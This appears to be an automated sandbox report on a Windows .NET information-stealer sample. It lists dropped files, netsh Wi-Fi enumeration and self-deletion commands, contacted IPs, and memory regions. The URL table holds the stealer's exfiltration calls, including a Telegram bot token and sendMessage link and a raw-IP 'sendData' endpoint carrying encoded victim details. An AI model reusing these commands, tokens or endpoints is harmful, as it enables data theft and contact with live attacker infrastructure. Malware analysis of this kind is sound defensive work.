Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
file.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\build.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\4wlo1v434o\report.lock
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log
|
CSV text
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators, with overstriking
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\file.exe
|
"C:\Users\user\Desktop\file.exe"
|
||
C:\Users\user\AppData\Local\Temp\build.exe
|
"C:\Users\user\AppData\Local\Temp\build.exe"
|
||
C:\Windows\System32\cmd.exe
|
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profiles
|
||
C:\Windows\System32\cmd.exe
|
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show networks mode=bssid
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr /R /C:"[ ]:[ ]"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr "SSID BSSID Signal"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\timeout.exe
|
timeout /t 3
|
There are 6 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.telegram.org
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==
|
41.216.183.9
|
||
https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage
|
unknown
|
||
https://api.tele
|
unknown
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
http://209.38.221.184:80802
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
http://185.217.98.121:80
|
unknown
|
||
https://138.2.92.67:443
|
unknown
|
||
http://209.38.221.184:8080/%79%4C%57%46%64%5F%66%72%6F%6E%74%64%65%73%6B%40%39%32%37%35%33%37%5F%72%
|
unknown
|
||
http://209.38.221.184:8080/yLWFd_user
|
unknown
|
||
http://167.235.70.96:8080
|
unknown
|
||
http://20.78.55.47:8080
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
http://107.161.20.142:8080
|
unknown
|
||
https://5.196.181.135:443
|
unknown
|
||
http://101.43.160.136:8080
|
unknown
|
||
http://41.216.183.9:8080/sendData
|
unknown
|
||
https://192.99.196.191:443
|
unknown
|
||
http://168.138.211.88:8099
|
unknown
|
||
http://ip-api.com/line?fields=query,country
|
208.95.112.1
|
||
http://18.228.80.130:80
|
unknown
|
||
http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user
|
unknown
|
||
https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=77347
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
http://209.38.221.184:8080/yLWFd_user%40927537_report.wsr
|
unknown
|
||
http://185.217.98.121:8080
|
unknown
|
||
http://8.219.110.16:9999
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://209.38.221.184
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
|
unknown
|
||
http://8.216.92.21:8080
|
unknown
|
||
http://65.49.205.24:8080
|
unknown
|
||
http://47.96.78.224:8080
|
unknown
|
||
http://129.151.109.160:8080
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://147.28.185.29:80
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://154.9.207.142:443
|
unknown
|
||
http://41.216.183.9:80802
|
unknown
|
||
http://209.38.221.184:8080
|
unknown
|
||
http://209.38.221.184:8080/get
|
unknown
|
||
http://www.w3.or
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://206.166.251.4:8080
|
unknown
|
||
http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user
|
unknown
|
||
http://194.164.198.113:8080
|
unknown
|
||
http://38.207.174.88:8080
|
unknown
|
||
http://ip-api.com/line?fields=query
|
unknown
|
||
http://127.0.0.1:18772/handleOpenWSR?r=http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user
|
unknown
|
||
http://159.203.174.113:8090
|
unknown
|
||
http://101.126.19.171:80
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un
|
unknown
|
||
https://185.217.98.121:443
|
unknown
|
||
http://46.235.26.83:8080
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
http://116.202.101.219:8080
|
unknown
|
||
http://38.60.191.38:80
|
unknown
|
||
http://67.230.176.97:8080
|
unknown
|
||
http://132.145.17.167:9090
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
|
149.154.167.220
|
||
http://127.0.0.1:18772/handleOpenWSR?r=
|
unknown
|
||
http://51.159.4.50:8080
|
unknown
|
||
http://8.222.143.111:8080
|
unknown
|
||
http://41.216.183.9:8080
|
unknown
|
||
https://support.mozilla.org
|
unknown
|
||
http://41.87.207.180:9090
|
unknown
|
||
http://api.telegram.org
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
There are 64 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
api.telegram.org
|
149.154.167.220
|
||
ip-api.com
|
208.95.112.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
209.38.221.184
|
unknown
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
41.216.183.9
|
unknown
|
South Africa
|
||
208.95.112.1
|
ip-api.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\build_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
26B66AC1000
|
trusted library allocation
|
page read and write
|
||
26B6703D000
|
trusted library allocation
|
page read and write
|
||
26B76BA0000
|
trusted library allocation
|
page read and write
|
||
1073A220000
|
heap
|
page read and write
|
||
27091FA1000
|
heap
|
page read and write
|
||
26B781C3000
|
trusted library allocation
|
page read and write
|
||
27091EF0000
|
heap
|
page read and write
|
||
55BC000
|
stack
|
page read and write
|
||
7FFAACD70000
|
trusted library allocation
|
page read and write
|
||
26B66EC4000
|
trusted library allocation
|
page read and write
|
||
26B78197000
|
trusted library allocation
|
page read and write
|
||
27091EE0000
|
heap
|
page read and write
|
||
26B781D3000
|
trusted library allocation
|
page read and write
|
||
26B7822A000
|
trusted library allocation
|
page read and write
|
||
26B7719E000
|
trusted library allocation
|
page read and write
|
||
26B66EA8000
|
trusted library allocation
|
page read and write
|
||
7FFAACD60000
|
trusted library allocation
|
page read and write
|
||
27092230000
|
heap
|
page read and write
|
||
26B76CAE000
|
trusted library allocation
|
page read and write
|
||
2600129D000
|
heap
|
page read and write
|
||
533E000
|
stack
|
page read and write
|
||
1E8DAFA5000
|
heap
|
page read and write
|
||
244F2100000
|
heap
|
page read and write
|
||
26B64C30000
|
unkown
|
page readonly
|
||
26B782BD000
|
trusted library allocation
|
page read and write
|
||
238D1CC0000
|
heap
|
page read and write
|
||
9C4000
|
trusted library allocation
|
page read and write
|
||
7FFAACBD0000
|
trusted library allocation
|
page read and write
|
||
26B7F330000
|
heap
|
page read and write
|
||
7FFAACC7C000
|
trusted library allocation
|
page execute and read and write
|
||
26B64ED0000
|
heap
|
page read and write
|
||
26B66887000
|
heap
|
page read and write
|
||
7E0000
|
trusted library allocation
|
page read and write
|
||
7F1A7FF000
|
stack
|
page read and write
|
||
26B781B1000
|
trusted library allocation
|
page read and write
|
||
7F1A6FF000
|
unkown
|
page read and write
|
||
27091FA2000
|
heap
|
page read and write
|
||
26B78473000
|
trusted library allocation
|
page read and write
|
||
7FFB1D540000
|
unkown
|
page readonly
|
||
2670000
|
heap
|
page read and write
|
||
26B66C09000
|
trusted library allocation
|
page read and write
|
||
B8F000
|
stack
|
page read and write
|
||
26B77BF3000
|
trusted library allocation
|
page read and write
|
||
9CD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
26001287000
|
heap
|
page read and write
|
||
E6D927E000
|
stack
|
page read and write
|
||
26B77413000
|
trusted library allocation
|
page read and write
|
||
26B66BFC000
|
trusted library allocation
|
page read and write
|
||
26B76C17000
|
trusted library allocation
|
page read and write
|
||
1E8DADC0000
|
heap
|
page read and write
|
||
26B670D4000
|
trusted library allocation
|
page read and write
|
||
26B782E8000
|
trusted library allocation
|
page read and write
|
||
26B77263000
|
trusted library allocation
|
page read and write
|
||
26B77AF3000
|
trusted library allocation
|
page read and write
|
||
26B66EB4000
|
trusted library allocation
|
page read and write
|
||
1073A1E0000
|
heap
|
page read and write
|
||
9F7000
|
trusted library allocation
|
page execute and read and write
|
||
26B76D76000
|
trusted library allocation
|
page read and write
|
||
803C4FC000
|
stack
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
26B783E8000
|
trusted library allocation
|
page read and write
|
||
26B781F1000
|
trusted library allocation
|
page read and write
|
||
26B77328000
|
trusted library allocation
|
page read and write
|
||
265E000
|
stack
|
page read and write
|
||
26B781EB000
|
trusted library allocation
|
page read and write
|
||
4AC0000
|
heap
|
page read and write
|
||
26B781F3000
|
trusted library allocation
|
page read and write
|
||
26B66D86000
|
trusted library allocation
|
page read and write
|
||
7FFAACBCD000
|
trusted library allocation
|
page execute and read and write
|
||
26B77221000
|
trusted library allocation
|
page read and write
|
||
26B78250000
|
trusted library allocation
|
page read and write
|
||
26B781E2000
|
trusted library allocation
|
page read and write
|
||
26B66876000
|
heap
|
page read and write
|
||
26B7831D000
|
trusted library allocation
|
page read and write
|
||
26B66C0D000
|
trusted library allocation
|
page read and write
|
||
81C000
|
heap
|
page read and write
|
||
26B66CE0000
|
trusted library allocation
|
page read and write
|
||
80758FC000
|
stack
|
page read and write
|
||
26B76B97000
|
trusted library allocation
|
page read and write
|
||
26B76D7E000
|
trusted library allocation
|
page read and write
|
||
26B64F90000
|
heap
|
page read and write
|
||
2F2000
|
unkown
|
page readonly
|
||
26B64CF0000
|
heap
|
page read and write
|
||
26B00607000
|
heap
|
page read and write
|
||
29EB7F000
|
stack
|
page read and write
|
||
26B66C0F000
|
trusted library allocation
|
page read and write
|
||
26B66B48000
|
trusted library allocation
|
page read and write
|
||
26B64E12000
|
heap
|
page read and write
|
||
26B66D9B000
|
trusted library allocation
|
page read and write
|
||
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
26B7823F000
|
trusted library allocation
|
page read and write
|
||
7FFAACBC3000
|
trusted library allocation
|
page execute and read and write
|
||
26B77213000
|
trusted library allocation
|
page read and write
|
||
26B6706F000
|
trusted library allocation
|
page read and write
|
||
26B66EFB000
|
trusted library allocation
|
page read and write
|
||
26B66C07000
|
trusted library allocation
|
page read and write
|
||
26B00510000
|
heap
|
page read and write
|
||
1073A1A0000
|
heap
|
page read and write
|
||
26B66BC1000
|
trusted library allocation
|
page read and write
|
||
7F1A3EC000
|
stack
|
page read and write
|
||
26B771E7000
|
trusted library allocation
|
page read and write
|
||
547E000
|
stack
|
page read and write
|
||
26B66E49000
|
trusted library allocation
|
page read and write
|
||
26B77AB3000
|
trusted library allocation
|
page read and write
|
||
26B783FD000
|
trusted library allocation
|
page read and write
|
||
26B00700000
|
heap
|
page read and write
|
||
26B7729D000
|
trusted library allocation
|
page read and write
|
||
26001225000
|
heap
|
page read and write
|
||
3685000
|
trusted library allocation
|
page read and write
|
||
26B66A40000
|
trusted library allocation
|
page read and write
|
||
26B783F3000
|
trusted library allocation
|
page read and write
|
||
26B66EE4000
|
trusted library allocation
|
page read and write
|
||
26B77BD3000
|
trusted library allocation
|
page read and write
|
||
7FFAACC80000
|
trusted library allocation
|
page execute and read and write
|
||
80759FF000
|
stack
|
page read and write
|
||
26B64E3A000
|
heap
|
page read and write
|
||
4E5E000
|
stack
|
page read and write
|
||
244F0850000
|
heap
|
page read and write
|
||
26B66C36000
|
trusted library allocation
|
page read and write
|
||
27092235000
|
heap
|
page read and write
|
||
26B66D06000
|
trusted library allocation
|
page read and write
|
||
26B76B52000
|
trusted library allocation
|
page read and write
|
||
26B66B2E000
|
trusted library allocation
|
page read and write
|
||
26B66B61000
|
trusted library allocation
|
page read and write
|
||
803BDFE000
|
stack
|
page read and write
|
||
26B7743D000
|
trusted library allocation
|
page read and write
|
||
26B77BFD000
|
trusted library allocation
|
page read and write
|
||
26B670AD000
|
trusted library allocation
|
page read and write
|
||
26B66B3B000
|
trusted library allocation
|
page read and write
|
||
26B7825D000
|
trusted library allocation
|
page read and write
|
||
26B66FAB000
|
trusted library allocation
|
page read and write
|
||
27091F8D000
|
heap
|
page read and write
|
||
26B66C2B000
|
trusted library allocation
|
page read and write
|
||
7FFAACCA6000
|
trusted library allocation
|
page execute and read and write
|
||
26B76BB3000
|
trusted library allocation
|
page read and write
|
||
26B66F04000
|
trusted library allocation
|
page read and write
|
||
803B1FE000
|
stack
|
page read and write
|
||
260012A2000
|
heap
|
page read and write
|
||
26B7741D000
|
trusted library allocation
|
page read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
26B66DD8000
|
trusted library allocation
|
page read and write
|
||
803B3FF000
|
stack
|
page read and write
|
||
75D000
|
stack
|
page read and write
|
||
26B774B3000
|
trusted library allocation
|
page read and write
|
||
26B77AA8000
|
trusted library allocation
|
page read and write
|
||
817000
|
heap
|
page read and write
|
||
244F2215000
|
heap
|
page read and write
|
||
807597F000
|
stack
|
page read and write
|
||
56BC000
|
stack
|
page read and write
|
||
26B7724F000
|
trusted library allocation
|
page read and write
|
||
26B76E0D000
|
trusted library allocation
|
page read and write
|
||
26B64F80000
|
trusted library allocation
|
page read and write
|
||
26B668C9000
|
heap
|
page read and write
|
||
26B66C2D000
|
trusted library allocation
|
page read and write
|
||
26B77BDD000
|
trusted library allocation
|
page read and write
|
||
2B0000
|
unkown
|
page readonly
|
||
26B66B35000
|
trusted library allocation
|
page read and write
|
||
7BE000
|
stack
|
page read and write
|
||
26B66BA6000
|
trusted library allocation
|
page read and write
|
||
26B66C29000
|
trusted library allocation
|
page read and write
|
||
27091F76000
|
heap
|
page read and write
|
||
26B77290000
|
trusted library allocation
|
page read and write
|
||
3681000
|
trusted library allocation
|
page read and write
|
||
26B00737000
|
heap
|
page read and write
|
||
775000
|
heap
|
page read and write
|
||
A70000
|
trusted library allocation
|
page read and write
|
||
26B782B3000
|
trusted library allocation
|
page read and write
|
||
26B76CB6000
|
trusted library allocation
|
page read and write
|
||
26B78313000
|
trusted library allocation
|
page read and write
|
||
26B6692E000
|
heap
|
page read and write
|
||
26B64E8B000
|
heap
|
page read and write
|
||
26B76B5F000
|
trusted library allocation
|
page read and write
|
||
26B67090000
|
trusted library allocation
|
page read and write
|
||
26B782DB000
|
trusted library allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
26B76C47000
|
trusted library allocation
|
page read and write
|
||
26B781CF000
|
trusted library allocation
|
page read and write
|
||
26B64FA0000
|
heap
|
page read and write
|
||
26B781D7000
|
trusted library allocation
|
page read and write
|
||
26B78230000
|
trusted library allocation
|
page read and write
|
||
26B772F3000
|
trusted library allocation
|
page read and write
|
||
803B6FE000
|
stack
|
page read and write
|
||
244F0859000
|
heap
|
page read and write
|
||
27091F90000
|
heap
|
page read and write
|
||
26B78186000
|
trusted library allocation
|
page read and write
|
||
26B782A8000
|
trusted library allocation
|
page read and write
|
||
26B64C32000
|
unkown
|
page readonly
|
||
26B66E98000
|
trusted library allocation
|
page read and write
|
||
26B670C1000
|
trusted library allocation
|
page read and write
|
||
26B66D00000
|
trusted library allocation
|
page read and write
|
||
26B66C05000
|
trusted library allocation
|
page read and write
|
||
26B783DD000
|
trusted library allocation
|
page read and write
|
||
7FFAACDC6000
|
trusted library allocation
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
26B76B32000
|
trusted library allocation
|
page read and write
|
||
26B781C7000
|
trusted library allocation
|
page read and write
|
||
26B76B74000
|
trusted library allocation
|
page read and write
|
||
26B66AB0000
|
heap
|
page execute and read and write
|
||
7FFAACBE0000
|
trusted library allocation
|
page read and write
|
||
26B6712C000
|
trusted library allocation
|
page read and write
|
||
26B781E8000
|
trusted library allocation
|
page read and write
|
||
7FFAACC70000
|
trusted library allocation
|
page read and write
|
||
26B76CA4000
|
trusted library allocation
|
page read and write
|
||
4CD0000
|
heap
|
page execute and read and write
|
||
26B670D2000
|
trusted library allocation
|
page read and write
|
||
26B64DF2000
|
heap
|
page read and write
|
||
26B78348000
|
trusted library allocation
|
page read and write
|
||
26B64F60000
|
trusted library allocation
|
page read and write
|
||
7FFB1D560000
|
unkown
|
page read and write
|
||
26B7722C000
|
trusted library allocation
|
page read and write
|
||
26B66DB8000
|
trusted library allocation
|
page read and write
|
||
26B76BA4000
|
trusted library allocation
|
page read and write
|
||
26B774FD000
|
trusted library allocation
|
page read and write
|
||
26B771F1000
|
trusted library allocation
|
page read and write
|
||
7FFAACDB0000
|
trusted library allocation
|
page execute and read and write
|
||
260012B4000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
26B66BF2000
|
trusted library allocation
|
page read and write
|
||
26B76D5E000
|
trusted library allocation
|
page read and write
|
||
26B7EAF0000
|
trusted library allocation
|
page read and write
|
||
1AB2B7F000
|
stack
|
page read and write
|
||
26B78249000
|
trusted library allocation
|
page read and write
|
||
8A0000
|
heap
|
page read and write
|
||
26B771A2000
|
trusted library allocation
|
page read and write
|
||
27091F8C000
|
heap
|
page read and write
|
||
26B771C3000
|
trusted library allocation
|
page read and write
|
||
26B66BC3000
|
trusted library allocation
|
page read and write
|
||
26B78164000
|
trusted library allocation
|
page read and write
|
||
26B77BE8000
|
trusted library allocation
|
page read and write
|
||
26B782FD000
|
trusted library allocation
|
page read and write
|
||
260011D0000
|
heap
|
page read and write
|
||
7FFAACD85000
|
trusted library allocation
|
page read and write
|
||
26B772E8000
|
trusted library allocation
|
page read and write
|
||
26B78238000
|
trusted library allocation
|
page read and write
|
||
26B78183000
|
trusted library allocation
|
page read and write
|
||
26B76DD6000
|
trusted library allocation
|
page read and write
|
||
26B64F95000
|
heap
|
page read and write
|
||
26B66FAF000
|
trusted library allocation
|
page read and write
|
||
803B4FC000
|
stack
|
page read and write
|
||
2550000
|
heap
|
page execute and read and write
|
||
26B771A7000
|
trusted library allocation
|
page read and write
|
||
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
26B7727F000
|
trusted library allocation
|
page read and write
|
||
26B66843000
|
heap
|
page read and write
|
||
803BEFE000
|
stack
|
page read and write
|
||
26B66F0A000
|
trusted library allocation
|
page read and write
|
||
7FF45A970000
|
trusted library allocation
|
page execute and read and write
|
||
26B77216000
|
trusted library allocation
|
page read and write
|
||
26B66ECB000
|
trusted library allocation
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
26B77388000
|
trusted library allocation
|
page read and write
|
||
26B6705D000
|
trusted library allocation
|
page read and write
|
||
26B779BD000
|
trusted library allocation
|
page read and write
|
||
803BAFB000
|
stack
|
page read and write
|
||
511F000
|
stack
|
page read and write
|
||
26B670BF000
|
trusted library allocation
|
page read and write
|
||
2600128C000
|
heap
|
page read and write
|
||
26B77B1D000
|
trusted library allocation
|
page read and write
|
||
7FFAACC76000
|
trusted library allocation
|
page read and write
|
||
26B7735D000
|
trusted library allocation
|
page read and write
|
||
56FE000
|
stack
|
page read and write
|
||
26B76CBD000
|
trusted library allocation
|
page read and write
|
||
26B78223000
|
trusted library allocation
|
page read and write
|
||
2681000
|
trusted library allocation
|
page read and write
|
||
26B76AC1000
|
trusted library allocation
|
page read and write
|
||
803ADAE000
|
stack
|
page read and write
|
||
26B77428000
|
trusted library allocation
|
page read and write
|
||
E5E000
|
stack
|
page read and write
|
||
7FFAACBC4000
|
trusted library allocation
|
page read and write
|
||
803C1FE000
|
stack
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
26B781DA000
|
trusted library allocation
|
page read and write
|
||
A10000
|
trusted library allocation
|
page read and write
|
||
244F0740000
|
heap
|
page read and write
|
||
26B76B9B000
|
trusted library allocation
|
page read and write
|
||
26B66BE3000
|
trusted library allocation
|
page read and write
|
||
26B76C2D000
|
trusted library allocation
|
page read and write
|
||
26B66BC5000
|
trusted library allocation
|
page read and write
|
||
51FE000
|
stack
|
page read and write
|
||
39C000
|
stack
|
page read and write
|
||
7FFB1D556000
|
unkown
|
page readonly
|
||
26B76B84000
|
trusted library allocation
|
page read and write
|
||
260012B2000
|
heap
|
page read and write
|
||
26B78162000
|
trusted library allocation
|
page read and write
|
||
BF90CFB000
|
stack
|
page read and write
|
||
26B7F300000
|
heap
|
page read and write
|
||
26B77228000
|
trusted library allocation
|
page read and write
|
||
26B781EF000
|
trusted library allocation
|
page read and write
|
||
E6D8F9C000
|
stack
|
page read and write
|
||
26B76CCE000
|
trusted library allocation
|
page read and write
|
||
26B670A2000
|
trusted library allocation
|
page read and write
|
||
26B66DA9000
|
trusted library allocation
|
page read and write
|
||
26B64E42000
|
heap
|
page read and write
|
||
9D4000
|
trusted library allocation
|
page read and write
|
||
26B66DAD000
|
trusted library allocation
|
page read and write
|
||
26B773F2000
|
trusted library allocation
|
page read and write
|
||
26B66E78000
|
trusted library allocation
|
page read and write
|
||
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
1073A22A000
|
heap
|
page read and write
|
||
26B66FBD000
|
trusted library allocation
|
page read and write
|
||
26B77433000
|
trusted library allocation
|
page read and write
|
||
7FFAACC1C000
|
trusted library allocation
|
page execute and read and write
|
||
26B77ADB000
|
trusted library allocation
|
page read and write
|
||
E6D92FF000
|
stack
|
page read and write
|
||
26B66F9D000
|
trusted library allocation
|
page read and write
|
||
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
26B771DF000
|
trusted library allocation
|
page read and write
|
||
1073A1B0000
|
heap
|
page read and write
|
||
7FFAACBED000
|
trusted library allocation
|
page execute and read and write
|
||
1E8DAE1A000
|
heap
|
page read and write
|
||
27091F5B000
|
heap
|
page read and write
|
||
26B772FD000
|
trusted library allocation
|
page read and write
|
||
26B77231000
|
trusted library allocation
|
page read and write
|
||
26B77353000
|
trusted library allocation
|
page read and write
|
||
27091F74000
|
heap
|
page read and write
|
||
26001430000
|
heap
|
page read and write
|
||
26B65060000
|
heap
|
page read and write
|
||
803B7FE000
|
stack
|
page read and write
|
||
BF90EFF000
|
stack
|
page read and write
|
||
543E000
|
stack
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
26B66E65000
|
trusted library allocation
|
page read and write
|
||
26B7F304000
|
heap
|
page read and write
|
||
26B7897D000
|
trusted library allocation
|
page read and write
|
||
29EA7C000
|
stack
|
page read and write
|
||
26B77202000
|
trusted library allocation
|
page read and write
|
||
26B66D8D000
|
trusted library allocation
|
page read and write
|
||
7FFB1D541000
|
unkown
|
page execute read
|
||
26B66F99000
|
trusted library allocation
|
page read and write
|
||
26B76B91000
|
trusted library allocation
|
page read and write
|
||
7FFAACBDD000
|
trusted library allocation
|
page execute and read and write
|
||
803BFFC000
|
stack
|
page read and write
|
||
26B66D81000
|
trusted library allocation
|
page read and write
|
||
26B66B98000
|
trusted library allocation
|
page read and write
|
||
7FE000
|
heap
|
page read and write
|
||
832000
|
heap
|
page read and write
|
||
803BCFC000
|
stack
|
page read and write
|
||
26B7819F000
|
trusted library allocation
|
page read and write
|
||
26B66BA1000
|
trusted library allocation
|
page read and write
|
||
26B76B8A000
|
trusted library allocation
|
page read and write
|
||
1073A1D5000
|
heap
|
page read and write
|
||
803BBFD000
|
stack
|
page read and write
|
||
26B64C30000
|
unkown
|
page readonly
|
||
26B781A7000
|
trusted library allocation
|
page read and write
|
||
26B7720F000
|
trusted library allocation
|
page read and write
|
||
26B76D6E000
|
trusted library allocation
|
page read and write
|
||
238D1D58000
|
heap
|
page read and write
|
||
2B2000
|
unkown
|
page readonly
|
||
9FB000
|
trusted library allocation
|
page execute and read and write
|
||
1E8DACC0000
|
heap
|
page read and write
|
||
238D20D5000
|
heap
|
page read and write
|
||
26B77333000
|
trusted library allocation
|
page read and write
|
||
26B77313000
|
trusted library allocation
|
page read and write
|
||
26B00733000
|
heap
|
page read and write
|
||
7FFAACD69000
|
trusted library allocation
|
page read and write
|
||
26B66BB8000
|
trusted library allocation
|
page read and write
|
||
26B783D3000
|
trusted library allocation
|
page read and write
|
||
4EF0000
|
heap
|
page read and write
|
||
26B64E10000
|
heap
|
page read and write
|
||
26B76AEA000
|
trusted library allocation
|
page read and write
|
||
2600126B000
|
heap
|
page read and write
|
||
803AD6F000
|
stack
|
page read and write
|
||
C8E000
|
stack
|
page read and write
|
||
238D1D5A000
|
heap
|
